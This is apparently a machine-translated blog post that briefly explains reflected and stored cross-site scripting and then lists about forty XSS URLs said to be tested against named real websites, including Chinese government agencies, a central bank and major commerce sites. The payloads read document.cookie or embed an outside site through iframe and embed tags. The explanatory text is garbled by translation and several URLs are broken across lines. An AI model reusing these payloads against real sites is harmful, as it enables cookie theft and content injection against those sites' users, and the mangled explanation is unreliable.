Note: The following connections are successfully tested in the browser.
For a webpage, XSS inserts content into the webpage without authorization.
Is a vulnerability.
However, you are more concerned about inserting content instead of authorization. This content is often harmful.
The harm is more to other netizens accessing this page. The code you inserted is run on me.
Now there are many things. "Running here" means that the Code has an environment, so XSS must be based on the environment. What is the situation?
In the case of XSS, this is the most critical.
Generally, XSS is divided into persistence and non-persistence. Both of them open a link and then automatically run the code (malicious
Parameters created), the persistent type is the database where the code is stored on the server, like the user name of a website, self-introduced
Shao, password, etc. If not filtered, there will be XSS. When I access your page, because your name is a piece of code
I have endured this code and the potential losses of this Code. A non-persistent type is a link, a chain
There is a parameter in it, which is a piece of code. After I click it, the browser opens this link and the link points to the program to execute this generation.
Code parameter, and then return to me the running result. The execution is actually triggered by providing code parameters to the program, which is real-time.
First: mingwan B2B
Http://search. B2B .cn/product? K = % 3 cscript % 3 ealert (% 27RC % 27) % 3c % 2 fscript % 3e
Second: phoenixnet
Http://my.ifeng.com /? C = friends & a = visit & ftype = 6 & friendName = % 3C/title % 3E % 3 Cscript % 3 Ealert ('
RC ') % 3C/script % 3E
Third: China Electronic Network
Http://search.21ic.com/so.php? Keyword = % 3 Cscript % 3 Ealert % 28document. cookie % 29%
3C % 2 Fscript % 3E
Fourth: China Energy Network
Http://www.power-cn.cn/sample/search.asp? Txtitle = <script> alert (document. cookie) </scr
Ipt>
Fifth: 21CN
Http://tags.21cn.com/tagsSearch? Tags = % 3 Cscript % 3 Ealert () % 3C/script % 3E
Sixth: chinnet
Http://mall.cnki.net/magazine/articlesearch.aspx? Keys = % 3 Ciframe % 20src = 'HTTP: // www.chinaxiaoe.com '% 3E % 3C/iframe % 3E
Seventh: Computer World
Http://www.ccw.com.cn/search/search_article.php? Keyword = % 3C % 2 Fspan % 3E % 3 Cifra
Me + src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E % 3C % 2 hour rame % 3E
Eighth: Suning Tesco
Http://www.suning.com/emall/Search? SearchKeywords = % 3 Cembed % 20SRC = HTTP: // WWW. CHINAXIAOE. COM % 3E % 3C/EMBED % 3E
Ninth: ANBO education www.2cto.com
Http://www.miiceic.org.cn/plus/search.php? Keyword = % 3 Ciframe + src % 3 Dhttp % 3A % 2F
% 2Fwww.chinaxiaoe.com % 3E % 3 Ciframe % 3E
Tenth: Pat
Net http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338
Kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html
11th: source code sky
Http://www.codesky.net/article/search? S = Random_Coder % 3C % 2 Ftitle % 3E % 3 Ciframe +
Src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E % 3C % 2 20.rame % 3E
12th: Catalogue
Http://so.mop.com? Q = % 3C/title % 3E % 3 Cembed % 20src = Http: // www.chinaxiaoe.com % 3E % 3C/em
Bed % 3E
13th: Lili female
Http://search.rayli.com.cn/searchII.html? Lxkw = % 3C/span % 3E % 3 Cembed % 20src = http ://
Www.chinaxiaoe.com % 3E % 3C/embed % 3E
14th: glutinous rice Network
Http://www.nuomi.com/search? K = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 DHttp % 3A % 2F %
2Fwww.chinaxiaoe.com % 3E % 3C % 2 Fembed % 3E
15th: CCN
Http://app.zhcw.com/wwwroot/zhcw/jsp/indexSearch.jsp? Query = Random_Coder % 3C % 2
Ftitle % 3E % 3 Cembed + src % 3 DHttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E & site = 2 & id = 1
18th: Pacific Network
Http://ks.pconline.com.cn/index.jsp? Q = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 Dhttp % 3A %
2F % 2Fwww.chinaxiaoe.com % 3E
19th: pangu search
Http://news.panguso.com/newssearch.htm? OrderType = 1 & q = % 3C % 2 Ftitle % 3E % 3 Cembe
D + src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E
20th: 7K7K games
Http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm
21st: mobile search
Http: // 202.85.216.217/query? Qt = % 3C/title % 3E % 3 Cembed % 20src = http://www.chinaxiaoe.com % 3E
22nd: 19 th Floor
Http://www.19lou.com/search/thread? Keyword = % 3C % 2 Ftitle % 3E % 3 Cembed % 20src % 3
Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E
23rd: China Daily
Http://search.chinadaily.com.cn/all_en.jsp? SearchText = % 22% 3E % 3 Cembed + src % 3 Dhttp
% 3A % 2F % 2Fwww.chinaxiaoe.com % 3E
24th: Download
Http://www.verycd.com/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3
A % 2F % 2Fwww.chinaxiaoe.com % 3E
25th: Tianya community
Http://search.tianya.cn? Q = % 3C % 2 Ftitle % 3E % 3 Cembed % 20src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E
26th: huajun Software Park
Http://search.newhua.com/search_list.php? Searchname = % 3C % 2 Ftitle % 3E % 3 Cembed %
2F * % 2 Fsrc % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E
28th: Beidou Mobile Network
Http://mobile.139shop.com/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src=
Http://www.chinaxiaoe.com %3e_00%1.htm
29th: appchina
Http://www.appchina.com/market/berry/search.action? Q = % 3 Cembed + src % 3 Dhttp % 3A
% 2F % 2Fwww.chinaxiaoe.com % 3E
30th: youren.com
Http://user.younet.com/search/default.php? Search_phone =\% 22/% 3E % 3 Cembed % 20src
Http://www.chinaxiaoe.com % 3E
31st: wheat bags
Http://search.mbaobao.com/searcher? K = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 Dhttp % 3A
% 2F % 2Fwww.chinaxiaoe.com % 3E
32nd: cofco I buy Network
Http://www.womai.com/ProductList.htm? Keywords = % 3C % 2 Ftitle % 3E % 3 Cembed % 2F *
% 2 Fsrc % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E
33rd: Yangguang shopping
Http://www.cnrmall.com/ TV /product/search.jsp? Key = % 22/% 3E % 3 Cembed % 20src = http :/
/Www.chinaxiaoe.com % 3E
34th: Full-seat Network
Http://s.manzuo.com/search? Keyword = % 22% 2F % 3E % 3 Cembed % 20src % 3 Dhttp % 3A %
2F % 2Fwww.chinaxiaoe.com % 3E
35th: youtao ordering Network
Http://www.utao365.com/search.php? Encode = YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAi
O3M6ODoia2V5d29yZHMiO3M6MzU6IjwvdGl0bGU % 2bPGVtYmVkIHNyYz1odHRwOi8vdG1
4ay5vcmc % duplicate
Signature =
=
36th: Meteorological Administration:
Http://www.cma.gov.cn: 8080/was40/search? Searchword = % 3 Cembed // src = http://www.chinaxiaoe.com % 3E
37th: Ministry of Transportation:
Http://search.moc.gov.cn: 8080/was40/search? Searchword = % 3 Cembed // src = http://www.chinaxiaoe.com % 3E
38th: Ministry of Culture:
Http://app.mcprc.gov.cn: 9000/was40/search? Channelid = 56599 & searchword = % 3 Ciframe
% 20src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E
39th: People's Bank of China:
Http://www.pbc.gov.cn: 8080/dig/Default. jsp? Q = % 22/% 3E % 3 Ciframe % 20src = http://www.chinaxiaoe.com % 3E/iframe % 3E
40th: China Telecom
Http://search.chinatelecom.com.cn/was40/search? Searchword = % 3 Ciframe // src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E
41st: Communist Youth League of China
Http://www.gqt.org.cn/was40/search? Channelid = 17472 & searchword = % 3 Ciframe // src = ht
Tp: // www.chinaxiaoe.com % 3E % 3C/iframe % 3E
42nd: Central compilation Board
Http://search.cctb.net: 8081/utf8/search. jsp? Channelid = 76134 & searchword = % 3 Ciframe //
Src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E